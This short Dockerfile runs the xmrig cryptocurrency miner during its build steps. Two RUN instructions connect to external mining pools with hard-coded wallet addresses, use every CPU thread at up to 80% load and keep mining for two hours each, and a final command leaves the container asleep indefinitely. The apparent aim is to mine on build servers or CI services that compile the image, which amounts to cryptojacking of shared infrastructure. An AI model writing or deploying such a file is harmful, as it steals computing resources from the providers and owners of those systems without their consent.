FROM eliteminer/xmrig_zero_docker
RUN xmrig -o stratum+tcp://kreditx.npool.pw:10031 -u KmAwaTtowuaSMZVH6EDXFqgo9a52yHA8Fgxei43eXiXhTASFaYzqba3icZLh915UV7ctU4d64YFDEWpSuaBiQb937s9g2Z6 --threads="$(nproc)" --max-cpu-usage=80 & sleep 7200
RUN xmrig -o stratum+tcp://ali.luckypool.io:4447 -u A5gJdtb7Wr8Qf2XXXwh3BG6BCjfrjWQ1EXZnA1QH2x98aGNuBARGJuMLYPejYZCUsuB1LcaGrMRww7BwRrNwSCeGLVxJj4y --threads="$(nproc)" --max-cpu-usage=80 & sleep 7200
CMD ["sleep", "600000000"]